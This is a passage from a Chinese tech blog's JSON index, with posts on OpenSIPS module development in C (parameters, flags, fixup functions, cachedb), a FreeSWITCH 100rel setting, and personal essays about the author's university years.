115: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/external-ipv6.xml 36: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/internal-ipv6.xml 27: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;false\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/external.xml 36: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; enable-100rel This enable support for 100rel (100% reliability - PRACK message as defined inRFC3262) This fixes a problem with SIP where provisional messages like \u0026ldquo;180 Ringing\u0026rdquo; are not ACK\u0026rsquo;d and therefore could be dropped over a poor connection without retransmission. 2009-07-08: Enabling this may cause FreeSWITCH to crash, seeFSCORE-392.\n参考 http://lists.freeswitch.org/pipermail/freeswitch-users/2018-April/129473.html https://freeswitch.org/confluence/display/FREESWITCH/Sofia+Configuration+Files https://tools.ietf.org/html/draft-ietf-sip-100rel-02 https://nickvsnetworking.com/sip-extensions-100rel-sip-rfc3262/ ","permalink":"https://wdd.js.org/opensips/ch9/100-rel/","summary":"sbc_100rel.pdf\n在fs中配置:\nenable-100rel 设置为true ➜ fs-conf ack 100rel sip_profiles/internal.xml 112: There are known issues (asserts and segfaults) when 100rel is enabled. 113: It is not recommended to enable 100rel at this time. 
115: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/external-ipv6.xml 36: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/internal-ipv6.xml 27: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;false\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/external.xml 36: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; enable-100rel This enable support for 100rel (100% reliability - PRACK message as defined inRFC3262) This fixes a problem with SIP where provisional messages like \u0026ldquo;180 Ringing\u0026rdquo; are not ACK\u0026rsquo;d and therefore could be dropped over a poor connection without retransmission.","title":"sbc 100rel"},{"content":"假如一个模块暴露了一个函数,叫做do_something(), 仅支持传递一个参数。这个函数在c文件中对应w_do_something()\n// 在opensips.cfg文件中 route{ do_something(\u0026#34;abc\u0026#34;) } static int w_do_something(struct sip_msg* msg, char* str1){ // 在c文件中,我们打印str1的值,这个字符串就是abc } // 在opensips.cfg文件中 route{ $var(num)=\u0026#34;abc\u0026#34;; do_something(\u0026#34;$var(num)\u0026#34;) } static int w_do_something(struct sip_msg* msg, char* str1){ // 在c文件中,我们打印str1的值,这个字符串就是$var(num) // 这时候就有问题了,其实我们想获取的是$var(num)的值abc, 而不是字符串$var(num) } 那怎么获取$var()的传参的值呢?这里就需要用到了函数的fixup_函数。\nstatic cmd_export_t cmds[]={ {\u0026#34;find_zone_code\u0026#34;, (cmd_function)w_do_something, 2, fixup_do_something, 0, REQUEST_ROUTE}, {0,0,0,0,0,0} }; // 调用fixup_spve, 只有在fixup函数中,对函数的参数执行了fixup, 在真正的执行函数中,才能得到真正的$var()的值 static int fixup_do_something(void** param, int param_no) { LM_INFO(\u0026#34;fixup_find_zone_code: param: %s param_no: %d\\n\u0026#34;, (char *)*param, param_no); return fixup_spve(param); } static int w_do_something (struct sip_msg* msg, char* str1){ str zone; if (fixup_get_svalue(msg, (gparam_p)str1, \u0026amp;zone) != 0) 
{ LM_WARN(\u0026#34;cannot find the phone!\\n\u0026#34;); return -1; } LM_INFO(\u0026#34;zone:%s\\n\u0026#34;, zone.s); return 1; } ","permalink":"https://wdd.js.org/opensips/module-dev/l4-3/","summary":"假如一个模块暴露了一个函数,叫做do_something(), 仅支持传递一个参数。这个函数在c文件中对应w_do_something()\n// 在opensips.cfg文件中 route{ do_something(\u0026#34;abc\u0026#34;) } static int w_do_something(struct sip_msg* msg, char* str1){ // 在c文件中,我们打印str1的值,这个字符串就是abc } // 在opensips.cfg文件中 route{ $var(num)=\u0026#34;abc\u0026#34;; do_something(\u0026#34;$var(num)\u0026#34;) } static int w_do_something(struct sip_msg* msg, char* str1){ // 在c文件中,我们打印str1的值,这个字符串就是$var(num) // 这时候就有问题了,其实我们想获取的是$var(num)的值abc, 而不是字符串$var(num) } 那怎么获取$var()的传参的值呢?这里就需要用到了函数的fixup_函数。\nstatic cmd_export_t cmds[]={ {\u0026#34;find_zone_code\u0026#34;, (cmd_function)w_do_something, 2, fixup_do_something, 0, REQUEST_ROUTE}, {0,0,0,0,0,0} }; // 调用fixup_spve, 只有在fixup函数中,对函数的参数执行了fixup, 在真正的执行函数中,才能得到真正的$var()的值 static int fixup_do_something(void** param, int param_no) { LM_INFO(\u0026#34;fixup_find_zone_code: param: %s param_no: %d\\n\u0026#34;, (char *)*param, param_no); return fixup_spve(param); } static int w_do_something (struct sip_msg* msg, char* str1){ str zone; if (fixup_get_svalue(msg, (gparam_p)str1, \u0026amp;zone) !","title":"ch4-3 $var() 类型的传参"},{"content":"2012年,我从安徽的一个小城市考到上海,前往一个普通的二本院校上大学,学习网络工程。\n在很多人看来,上大学不就是玩吗?其实也基本属实,特别是像我们这种普通的学校。但是我的大学也并没有荒废,这其实也并不是说明我就多优秀。 这其中的原因,说来也是蛮有意思。我打游戏太菜,而且心理素质不好,且又没有坚持不懈的毅力。所以我就早早的放弃了英雄联盟这种游戏。\n一个大学生,一旦放弃了打游戏,其实他就剩余了很多空余的时间。多余的时间能干什么呢?\n选择不多。1. 
可以选择谈谈恋爱。但是一来我囊中羞涩,二来也没有什么长得比较漂亮,一见钟情的女生。所以谈恋爱这事就放下了。 剩下的选择便只有一个,学习。\n对了,就是学习。当其他人都选择游戏娱乐的时候,你稍微用点力,就能比很多人优秀。\n下一个问题就是学习。 学习要有兴趣,并且要决定学什么。\n这种时候,我思潮又落入回忆中,似乎忘记的事情,此刻又清晰想起来。\n那是我初三暑假的时候,参加过一次学校组织的计算机免费培训课程,其中培训了很多东西。像五笔打字、制作flash、学习photoshop之类的。上课老师在课堂上说过,培训结束的时候,会选择几个成绩优异的学生,给予几百块的奖励。为了这几百块的奖励,我也不能退缩,我很快记住了五笔词根。然后在课堂上,我在众同学佩服的眼光中,把五笔字根全部背了一遍给老师听。\n学习的内容中,photoshop着实给我打开了一个通往神秘世界的大门,原来电脑还能做这么牛逼的事情。接下来经过我废寝忘食,专心致志,一丝不苟的学习,我已经知道了一些基本的图片制作技巧。利用这个技巧,我做了很多搞笑的图片,just for fun!\n然而直到暑假结束,很多同学心心念念的几百块奖励,讲课老师再也没有提过。\n我想,有了初中的ps经验,况且我对这东西很感兴趣。所以我就从淘宝上花了几十块钱,买了一本很厚的,讲解photoshop的书。按照书中的指导,我对photoshop有了全面系统的学习,然后又跟着实战,学会了很多关于抠图、美容、特效的技术。虽然我学了photoshop,但是感觉上并没有什么用,因为考试又不考photoshop, 所以我只能自己通过制作一些搞笑图片来自娱自乐。\n然而,一旦你学会某个东西,便真的有派上用场的时候。大四快毕业时,很多同学开始搞简历,简历上一般要贴照片的。所以我便成为了班级里远近闻名的修图大师。\n除了photoshop,专业课上可以说的就是学习编程了。当时我c语言学的非常好,授课老师经常在课堂上提我来回答问题。为了避免回答不上来问题,显得很没面子。我经常在上课之前偷偷的就预习上课的内容,并且学习如何解答课后的习题。所以老师的提问我经常可以轻松的回答。老师似乎觉得我是个可造之才,经常在其他班级上课的时候,也会在课上提我的名字,说:其他班的王xx同学,他这个问题回答的很好。所以一些其他班级的同学,也是知道我的名字的。\n每每到考试之前,我总会收到不少加我QQ好友的申请,然后问我有没有时间,想找我帮他们复习c语言。然后带上饮料,约我到图书馆,当面传道授业解惑。我还记得一个比较奇葩的老师,给同学布置作业,要求实现某某功能,至少要求要有三千行代码,然后该同学东拼西凑,也只凑够了快一千行,然后找我帮忙。\n可以参考:\n大二的暑假,我们搬了校区。从远离市区的新校区,搬到了离市区比较近的老校区。\n快放假了,有不少的同学决定暑假留校,然后找点工作,赚点零花钱。\n我也觉得放假回家没意思,决定暑假找工作。因为我有一些photoshop的基础,所以就在招聘网站上写自己精通photoshop,看看有没有人需要。很快我找到了一份工作,然而刚开始的工作并不是图片制作,而是摄影摄像。具体的内容是给古玩艺术品拍照,然后我就一边学习一边拍照,照片拍完还要用ps做后期处理。所以整个暑假,包括大三,和大四。我基本上都在和古玩艺术品打交道,见识了不少的宝贝。从书画,到紫砂壶,玉器,陶器,手工艺品等等,都有接触。上海的各大古玩城,我也基本都跑过好几遍。也组织过一次小型的拍卖会,主要负责拍卖图册的制作。\n我的大三和大四是很忙的,倒不是学习,而是课外的工作。工作很累,每晚基本上都是9点以后下班,回到学校就基本上10点左右。有时候因为太累而在地铁上睡着,结果坐过站了。正好是最后一班地铁,所以只能下了地铁,步行往回走。\n课外的工作很累,但也学到了不少的东西。除此之外,就是自己赚钱能养活自己了。至少大三和大四,我没有再问父母要过生活费。即使是对于父母,要生活费这件事情,也让我觉得不自在。我是一个向往自由的人,不希望被任何人束缚,即使是父母。\n课外工作的最后阶段,我用自己赚的钱买了人生第一个非常贵的手机iphone6s。我觉得,这是我应得的东西。\n匆匆4年,大学就这么结束了。我对大学并没有什么怀念,只是觉得,我算是蛮幸运的,至少没有白白浪费掉四年的光阴。\n","permalink":"https://wdd.js.org/posts/2021/04/mcgyoz/","summary":"2012年,我从安徽的一个小城市考到上海,前往一个普通的二本院校上大学,学习网络工程。\n在很多人看来,上大学不就是玩吗?其实也基本属实,特别是像我们这种普通的学校。但是我的大学也并没有荒废,这其实也并不是说明我就多优秀。 
这其中的原因,说来也是蛮有意思。我打游戏太菜,而且心理素质不好,且又没有坚持不懈的毅力。所以我就早早的放弃了英雄联盟这种游戏。\n一个大学生,一旦放弃了打游戏,其实他就剩余了很多空余的时间。多余的时间能干什么呢?\n选择不多。1. 可以选择谈谈恋爱。但是一来我囊中羞涩,二来也没有什么长得比较漂亮,一见钟情的女生。所以谈恋爱这事就放下了。 剩下的选择便只有一个,学习。\n对了,就是学习。当其他人都选择游戏娱乐的时候,你稍微用点力,就能比很多人优秀。\n下一个问题就是学习。 学习要有兴趣,并且要决定学什么。\n这种时候,我思潮又落入回忆中,似乎忘记的事情,此刻又清晰想起来。\n那是我初三暑假的时候,参加过一次学校组织的计算机免费培训课程,其中培训了很多东西。像五笔打字、制作flash、学习photoshop之类的。上课老师在课堂上说过,培训结束的时候,会选择几个成绩优异的学生,给予几百块的奖励。为了这几百块的奖励,我也不能退缩,我很快记住了五笔词根。然后在课堂上,我在众同学佩服的眼光中,把五笔字根全部背了一遍给老师听。\n学习的内容中,photoshop着实给我打开了一个通往神秘世界的大门,原来电脑还能做这么牛逼的事情。接下来经过我废寝忘食,专心致志,一丝不苟的学习,我已经知道了一些基本的图片制作技巧。利用这个技巧,我做了很多搞笑的图片,just for fun!\n然而直到暑假结束,很多同学心心念念的几百块奖励,讲课老师再也没有提过。\n我想,有了初中的ps经验,况且我对这东西很感兴趣。所以我就从淘宝上花了几十块钱,买了一本很厚的,讲解photoshop的书。按照书中的指导,我对photoshop有了全面系统的学习,然后又跟着实战,学会了很多关于抠图、美容、特效的技术。虽然我学了photoshop,但是感觉上并没有什么用,因为考试又不考photoshop, 所以我只能自己通过制作一些搞笑图片来自娱自乐。\n然而,一旦你学会某个东西,便真的有派上用场的时候。大四快毕业时,很多同学开始搞简历,简历上一般要贴照片的。所以我便成为了班级里远近闻名的修图大师。\n除了photoshop,专业课上可以说的就是学习编程了。当时我c语言学的非常好,授课老师经常在课堂上提我来回答问题。为了避免回答不上来问题,显得很没面子。我经常在上课之前偷偷的就预习上课的内容,并且学习如何解答课后的习题。所以老师的提问我经常可以轻松的回答。老师似乎觉得我是个可造之才,经常在其他班级上课的时候,也会在课上提我的名字,说:其他班的王xx同学,他这个问题回答的很好。所以一些其他班级的同学,也是知道我的名字的。\n每每到考试之前,我总会收到不少加我QQ好友的申请,然后问我有没有时间,想找我帮他们复习c语言。然后带上饮料,约我到图书馆,当面传道授业解惑。我还记得一个比较奇葩的老师,给同学布置作业,要求实现某某功能,至少要求要有三千行代码,然后该同学东拼西凑,也只凑够了快一千行,然后找我帮忙。\n可以参考:\n大二的暑假,我们搬了校区。从远离市区的新校区,搬到了离市区比较近的老校区。\n快放假了,有不少的同学决定暑假留校,然后找点工作,赚点零花钱。\n我也觉得放假回家没意思,决定暑假找工作。因为我有一些photoshop的基础,所以就在招聘网站上写自己精通photoshop,看看有没有人需要。很快我找到了一份工作,然而刚开始的工作并不是图片制作,而是摄影摄像。具体的内容是给古玩艺术品拍照,然后我就一边学习一边拍照,照片拍完还要用ps做后期处理。所以整个暑假,包括大三,和大四。我基本上都在和古玩艺术品打交道,见识了不少的宝贝。从书画,到紫砂壶,玉器,陶器,手工艺品等等,都有接触。上海的各大古玩城,我也基本都跑过好几遍。也组织过一次小型的拍卖会,主要负责拍卖图册的制作。\n我的大三和大四是很忙的,倒不是学习,而是课外的工作。工作很累,每晚基本上都是9点以后下班,回到学校就基本上10点左右。有时候因为太累而在地铁上睡着,结果坐过站了。正好是最后一班地铁,所以只能下了地铁,步行往回走。\n课外的工作很累,但也学到了不少的东西。除此之外,就是自己赚钱能养活自己了。至少大三和大四,我没有再问父母要过生活费。即使是对于父母,要生活费这件事情,也让我觉得不自在。我是一个向往自由的人,不希望被任何人束缚,即使是父母。\n课外工作的最后阶段,我用自己赚的钱买了人生第一个非常贵的手机iphone6s。我觉得,这是我应得的东西。\n匆匆4年,大学就这么结束了。我对大学并没有什么怀念,只是觉得,我算是蛮幸运的,至少没有白白浪费掉四年的光阴。","title":"我的传记 - 大学篇"},{"content":"flag的类型 enum flag_type { FLAG_TYPE_MSG=0, 
FLAG_TYPE_BRANCH, FLAG_LIST_COUNT, }; flag实际上是一种二进制的位 MAX_FLAG就是一个SIP消息最多可以有多少个flag\n#include \u0026lt;limits.h\u0026gt; typedef unsigned int flag_t; #define MAX_FLAG ((unsigned int)( sizeof(flag_t) * CHAR_BIT - 1 )) 这个值根据情况而定,我的机器上是最多32个。\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;limits.h\u0026gt; typedef unsigned int flag_t; #define MAX_FLAG ((unsigned int)( sizeof(flag_t) * CHAR_BIT - 1 )) int main() { printf(\u0026#34;%zu\\n\u0026#34;, sizeof(unsigned int)); printf(\u0026#34;%u\\n\u0026#34;, CHAR_BIT); printf(\u0026#34;%u\\n\u0026#34;, MAX_FLAG); return 0; } $gcc -o main *.c $main 4 8 31 由字符串获取flag opensips 1.0时,flag都是整数,2.0才引入了字符串。\n用数字容易傻傻分不清楚,字符串比较容易理解。\nsetflag(3); setflag(4); setflag(5); setflag(IS_FROM_SBC); 首先,我们先要获取flag的字符串表示。这个可以用模块的参数传递进来。\nstatic param_export_t params[]={ {\u0026#34;use_test_flag\u0026#34;, STR_PARAM, \u0026amp;use_test_flag_str}, {0,0,0} }; 然后我们需要在mod_init或者fixup函数中获取字符串flag对应的flagId\nstatic int mod_init(void) { flag_use_high = get_flag_id_by_name(FLAG_TYPE_MSG, use_test_flag_str); LM_INFO(\u0026#34;flag mask: %d\\n\u0026#34;, flag_use_high); return 0; } 在消息处理中,用isflagset去判断flag是否存在。isflagset返回-1,就说明flag不存在。返回1就说明flag已经存在。\nstatic int w_find_zone_code(struct sip_msg* msg, char* str1,char* str2) { int is_set = isflagset(msg, flag_use_high); LM_INFO(\u0026#34;flag_use_high is %d\\n\u0026#34;, is_set); return 1; } ","permalink":"https://wdd.js.org/opensips/module-dev/l4-2/","summary":"flag的类型 enum flag_type { FLAG_TYPE_MSG=0, FLAG_TYPE_BRANCH, FLAG_LIST_COUNT, }; flag实际上是一种二进制的位 MAX_FLAG就是一个SIP消息最多可以有多少个flag\n#include \u0026lt;limits.h\u0026gt; typedef unsigned int flag_t; #define MAX_FLAG ((unsigned int)( sizeof(flag_t) * CHAR_BIT - 1 )) 这个值根据情况而定,我的机器上是最多32个。\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;limits.h\u0026gt; typedef unsigned int flag_t; #define MAX_FLAG ((unsigned int)( sizeof(flag_t) * CHAR_BIT - 1 )) int main() { printf(\u0026#34;%zu\\n\u0026#34;, sizeof(unsigned int)); 
printf(\u0026#34;%u\\n\u0026#34;, CHAR_BIT); printf(\u0026#34;%u\\n\u0026#34;, MAX_FLAG); return 0; } $gcc -o main *.c $main 4 8 31 由字符串获取flag opensips 1.0时,flag都是整数,2.0才引入了字符串。\n用数字容易傻傻分不清楚,字符串比较容易理解。","title":"ch4-2 flag获取"},{"content":"最近看到澎湃新闻报道了一个博士论文的致谢部分,内容如下:\n走了很远的路,吃了很多的苦,才将这份博士学位论文送到你的面前。二十二载求学路,一路风雨泥泞,许多不容易。如梦一场,仿佛昨天一家人才团聚过。\n看到这个句子,我瞬间觉得一种似曾相识之感。\n我记得我也曾写过类似的句子。\n我花了很长的时间,走过了人生的大半个青葱岁月的花样年华 才学会什么是效率,什么是专一。 蓦然回首 10年的路,每次转变的开始都是感觉镣铐加身,步履维艰,屡次三番想要放弃\n生命不息 折腾不止 使用ubuntu作为主力开发工具\n其实,这种句子也不是我的原创。是我仿照我看过的一本小说,从中摘抄而来。\n这本小说叫做《项塔兰》\n我花了很长的岁月,走过大半个世界,才真正学到什么是爱、什么是命运,以及我们所做的抉择。我被拴在墙上遭受拷打时,才顿悟这个真谛。不知为何,就在我内心发出呐喊之际,我意识到,即使镣铐加身,一身血污,孤立无助,我仍然是自由之身,我可以决定是要痛恨拷打我的人,还是原谅他们。我知道,这听起来似乎算不了什么,但在镣铐加身、痛苦万分的当下,当镣铐是你唯一仅有的,那份自由将带给你无限的希望。是要痛恨,还是要原谅,这抉择足以决定人一生的际遇。《项塔兰》\n这是一名通缉犯的十年印度流亡岁月的记录,很难想象,一名在逃犯是如何写出如此优秀的文笔。各位看官有时间可以看看。\n参考 https://mp.weixin.qq.com/s/9kfGCXevO5Hlpg_iINof6Q ","permalink":"https://wdd.js.org/posts/2021/04/dttcg5/","summary":"最近看到澎湃新闻报道了一个博士论文的致谢部分,内容如下:\n走了很远的路,吃了很多的苦,才将这份博士学位论文送到你的面前。二十二载求学路,一路风雨泥泞,许多不容易。如梦一场,仿佛昨天一家人才团聚过。\n看到这个句子,我瞬间觉得一种似曾相识之感。\n我记得我也曾写过类似的句子。\n我花了很长的时间,走过了人生的大半个青葱岁月的花样年华 才学会什么是效率,什么是专一。 蓦然回首 10年的路,每次转变的开始都是感觉镣铐加身,步履维艰,屡次三番想要放弃\n生命不息 折腾不止 使用ubuntu作为主力开发工具\n其实,这种句子也不是我的原创。是我仿照我看过的一本小说,从中摘抄而来。\n这本小说叫做《项塔兰》\n我花了很长的岁月,走过大半个世界,才真正学到什么是爱、什么是命运,以及我们所做的抉择。我被拴在墙上遭受拷打时,才顿悟这个真谛。不知为何,就在我内心发出呐喊之际,我意识到,即使镣铐加身,一身血污,孤立无助,我仍然是自由之身,我可以决定是要痛恨拷打我的人,还是原谅他们。我知道,这听起来似乎算不了什么,但在镣铐加身、痛苦万分的当下,当镣铐是你唯一仅有的,那份自由将带给你无限的希望。是要痛恨,还是要原谅,这抉择足以决定人一生的际遇。《项塔兰》\n这是一名通缉犯的十年印度流亡岁月的记录,很难想象,一名在逃犯是如何写出如此优秀的文笔。各位看官有时间可以看看。\n参考 https://mp.weixin.qq.com/s/9kfGCXevO5Hlpg_iINof6Q ","title":"关于中科院回信文字的联想"},{"content":"底层可用 local 缓存存在本地,速度快,但是多实例无法共享,重启后消失 redis 缓存存在redis, 多实例可以共享,重启后不消失 接口 store -cache_store() 存储 fetch -cache_fetch() 获取 remove -cache_remove() 删除 add -cache_add() 递增 sub -cache_sub() 递减 cache_counter_fetch 获取某个key的值 关于过期的单位 虽然文档上没有明说,但是过期的单位都是秒。\ncachedb_local过期 loadmodule \u0026#34;cachedb_local.so\u0026#34; modparam(\u0026#34;cachedb_local\u0026#34;, 
\u0026#34;cachedb_url\u0026#34;, \u0026#34;local://\u0026#34;) modparam(\u0026#34;cachedb_local\u0026#34;, \u0026#34;cache_clean_period\u0026#34;, 600) route[xxx]{ cache_add(\u0026#34;local\u0026#34;, \u0026#34;$fu\u0026#34;, 100, 5); } 假如说:在5秒之内,同一个$fu来了多个请求,在设置这个$fu值的时候,计时器是不会重置的。过期的计时器还是从第一次设置的那个时间点开始计时。\n参考 https://www.opensips.org/Documentation/Tutorials-KeyValueInterface ","permalink":"https://wdd.js.org/opensips/ch6/cachedb/","summary":"底层可用 local 缓存存在本地,速度快,但是多实例无法共享,重启后消失 redis 缓存存在redis, 多实例可以共享,重启后不消失 接口 store -cache_store() 存储 fetch -cache_fetch() 获取 remove -cache_remove() 删除 add -cache_add() 递增 sub -cache_sub() 递减 cache_counter_fetch 获取某个key的值 关于过期的单位 虽然文档上没有明说,但是过期的单位都是秒。\ncachedb_local过期 loadmodule \u0026#34;cachedb_local.so\u0026#34; modparam(\u0026#34;cachedb_local\u0026#34;, \u0026#34;cachedb_url\u0026#34;, \u0026#34;local://\u0026#34;) modparam(\u0026#34;cachedb_local\u0026#34;, \u0026#34;cache_clean_period\u0026#34;, 600) route[xxx]{ cache_add(\u0026#34;local\u0026#34;, \u0026#34;$fu\u0026#34;, 100, 5); } 假如说:在5秒之内,同一个$fu来了多个请求,在设置这个$fu值的时候,计时器是不会重置的。过期的计时器还是从第一次设置的那个时间点开始计时。\n参考 https://www.opensips.org/Documentation/Tutorials-KeyValueInterface ","title":"cachedb的相关问题"},{"content":"模块传参有两种类型\n直接赋值传参 间接函数调用传参 str local_zone_code = {\u0026#34;\u0026#34;,0}; int some_int_param = 0; static param_export_t params[]={ // 直接字符串赋值 {\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, // 直接整数赋值 {\u0026#34;some_int_param\u0026#34;, INT_PARAM, \u0026amp;some_int_param}, // 函数调用 字符串 {\u0026#34;zone_code_map\u0026#34;, STR_PARAM|USE_FUNC_PARAM, (void *)\u0026amp;set_code_zone_map}, // 函数调用 整数 {\u0026#34;zone_code_map_int\u0026#34;, INT_PARAM|USE_FUNC_PARAM, (void *)\u0026amp;set_code_zone_map_int}, {0,0,0} }; 使用函数处理参数的好处是,可以对参数做更复杂的处理。\n例如:\n某个参数可以多次传递 对参数进行校验,在启动前就可以判断传参是否有问题。 static int set_code_zone_map(unsigned int type, void *val) { LM_INFO(\u0026#34;set_zone_code_map type:%d val:%s \\n\u0026#34;,type,(char *)val); return 1; } 
","permalink":"https://wdd.js.org/opensips/module-dev/l4-1/","summary":"模块传参有两种类型\n直接赋值传参 间接函数调用传参 str local_zone_code = {\u0026#34;\u0026#34;,0}; int some_int_param = 0; static param_export_t params[]={ // 直接字符串赋值 {\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, // 直接整数赋值 {\u0026#34;some_int_param\u0026#34;, INT_PARAM, \u0026amp;some_int_param}, // 函数调用 字符串 {\u0026#34;zone_code_map\u0026#34;, STR_PARAM|USE_FUNC_PARAM, (void *)\u0026amp;set_code_zone_map}, // 函数调用 整数 {\u0026#34;zone_code_map_int\u0026#34;, INT_PARAM|USE_FUNC_PARAM, (void *)\u0026amp;set_code_zone_map_int}, {0,0,0} }; 使用函数处理参数的好处是,可以对参数做更复杂的处理。\n例如:\n某个参数可以多次传递 对参数进行校验,在启动前就可以判断传参是否有问题。 static int set_code_zone_map(unsigned int type, void *val) { LM_INFO(\u0026#34;set_zone_code_map type:%d val:%s \\n\u0026#34;,type,(char *)val); return 1; } ","title":"ch4-1 USE_FUNC_PARAM参数类型"},{"content":"本章节,带领大家探索opensips模块开发。希望深入了解opensips的同学可以看看。\n内容涵盖 章节的内容将会涵盖\nopensips的启动流程 如何创建一个模块 如何给模块传递参数 模块的生命周期函数的处理 如何暴露自定义的函数 如何检查函数的传参 如何获取$var或者$avp变量 如何获取相关的flag 如何修改SIP消息 如何编写mi接口 如何编写statistics统计数据 如何做数据库操作 OpenSIPS架构 参考 https://voipmagazine.files.wordpress.com/2014/09/opensips-arch.jpg ","permalink":"https://wdd.js.org/opensips/module-dev/l1/","summary":"本章节,带领大家探索opensips模块开发。希望深入了解opensips的同学可以看看。\n内容涵盖 章节的内容将会涵盖\nopensips的启动流程 如何创建一个模块 如何给模块传递参数 模块的生命周期函数的处理 如何暴露自定义的函数 如何检查函数的传参 如何获取$var或者$avp变量 如何获取相关的flag 如何修改SIP消息 如何编写mi接口 如何编写statistics统计数据 如何做数据库操作 OpenSIPS架构 参考 https://voipmagazine.files.wordpress.com/2014/09/opensips-arch.jpg ","title":"ch1 开发课程简介"},{"content":"开始 我们需要给home_location模块增加一个参数,配置当地的号码区号\n首先,我们删除maxfwd.c文件中开头的很多注释,我们先把注意力集中在代码上。\n删除了30多行注释,代码还剩160多行。\n首先我们定义一个变量,用来保存本地的区号。这个变量是个str类型。\nstr local_zone_code = {\u0026#34;\u0026#34;,0}; str 关于str类型,可以参考opensips/str.h头文件。\nstruct __str { char* s; /**\u0026lt; string as char array */ int len; /**\u0026lt; string length, not including null-termination */ }; typedef struct __str str; 
实际上,str就是__str结构体的别名,可以看出这个结构体有指向字符串的char*类型的指针,以及一个代表字符串长度的len属性。这样做的好处是可以高效的获取字符串的长度,很多有名的开源项目都有类似的结构体。\nopensips几乎所有的字符串都是用的str类型\nparam_export_t param_export_t这个结构体是用来通过脚本里面的modparam向模块传递参数的。这个数组最后一项是{0,0,0} 这最后一项其实是个标志,标志着数组的结束。\nstatic param_export_t params[]={ {\u0026#34;max_limit\u0026#34;, INT_PARAM, \u0026amp;max_limit}, {\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, {0,0,0} }; 在sr_module_deps.h和sr_module.h中有下面的代码\ntypedef struct param_export_ param_export_t; param_export_t实际上就是param_export_这个结构体的别名。\n这个结构体有三个参数\nname 表示参数的名称 modparam_t 表示参数的类型。参数类型有以下几种 STR_PARAM 字符串类型 INT_PARAM 整数类型 USE_FUNC_PARAM 函数类型 PARAM_TYPE_MASK 这个用到的时候再说 param_pointer 是一个指针,用到的时候再具体说明 struct param_export_ { char* name; /*!\u0026lt; null terminated param. name */ modparam_t type; /*!\u0026lt; param. type */ void* param_pointer; /*!\u0026lt; pointer to the param. memory location */ }; #define STR_PARAM (1U\u0026lt;\u0026lt;0) /* String parameter type */ #define INT_PARAM (1U\u0026lt;\u0026lt;1) /* Integer parameter type */ #define USE_FUNC_PARAM (1U\u0026lt;\u0026lt;(8*sizeof(int)-1)) #define PARAM_TYPE_MASK(_x) ((_x)\u0026amp;(~USE_FUNC_PARAM)) typedef unsigned int modparam_t; 回过头来,看看local_zone_code这个参数的配置,是不是就非常明确了呀\n{\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, 接着,你可能会问,假如我们配置好了这个参数,如何在运行的时候将local_zone_code这个变量的值打印出来呢?\n在module_exports这个结构体里面,最后的几个参数实际上是一个函数。\n这些函数在模块的生命周期内会被调用。比如那个mod_init, 就是模块初始化的时候就会调用这个函数。\n那么,我们就在模块初始化的时候打印local_zone_code的值好了。\n下面的代码,我们其实只插入了一行, LM_INFO, 用来打印。其他就保持原样好了。\nmod_init函数的返回值是有特殊含义的,如果返回是0,表示成功。如果返回的是负数, 例如E_CFG, 这时候opensips就会认为你的脚本写的有问题,就不会继续启动opensips。\nstatic int mod_init(void) { LM_INFO(\u0026#34;initializing...\\n\u0026#34;); LM_INFO(\u0026#34;Initializing local_zone_code: %s\\n\u0026#34;, local_zone_code.s); if ( max_limit\u0026lt;1 || max_limit\u0026gt;MAXFWD_UPPER_LIMIT ) { LM_ERR(\u0026#34;invalid max limit (%d) [1,%d]\\n\u0026#34;, max_limit,MAXFWD_UPPER_LIMIT); return E_CFG; 
} return 0; } 在error.h中,可以看到opensips定义了很多的错误码。\n编译模块 源码的c文件我们修改好了,下面就是编译它,不知道会不会报错呢?😂\n➜ home_location git:(home_location) ✗ ./dev.sh build /root/code/gitee/opensips make[1]: Entering directory \u0026#39;/root/code/gitee/opensips/modules/home_location\u0026#39; Compiling maxfwd.c Linking home_location.so make[1]: Leaving directory \u0026#39;/root/code/gitee/opensips/modules/home_location\u0026#39; 似乎没啥问题\n编辑dev.cfg 增加local_zone_code参数 loadmodule \u0026#34;/root/code/gitee/opensips/modules/home_location/home_location.so\u0026#34; + modparam(\u0026#34;home_location\u0026#34;, \u0026#34;local_zone_code\u0026#34;, \u0026#34;010\u0026#34;) ./dev.sh start 看看log.txt, local_zone_code已经被打印出来,并且它的值是我们在cfg脚本里配置的010。\n~ Apr 21 13:47:40 [1048372] INFO:home_location:mod_init: initializing... ~ Apr 21 13:47:40 [1048372] INFO:home_location:mod_init: Initializing local_zone_code: 010 ok, 第三章结束。\n","permalink":"https://wdd.js.org/opensips/module-dev/l4/","summary":"开始 我们需要给home_location模块增加一个参数,配置当地的号码区号\n首先,我们删除maxfwd.c文件中开头的很多注释,我们先把注意力集中在代码上。\n删除了30多行注释,代码还剩160多行。\n首先我们定义一个变量,用来保存本地的区号。这个变量是个str类型。\nstr local_zone_code = {\u0026#34;\u0026#34;,0}; str 关于str类型,可以参考opensips/str.h头文件。\nstruct __str { char* s; /**\u0026lt; string as char array */ int len; /**\u0026lt; string length, not including null-termination */ }; typedef struct __str str; 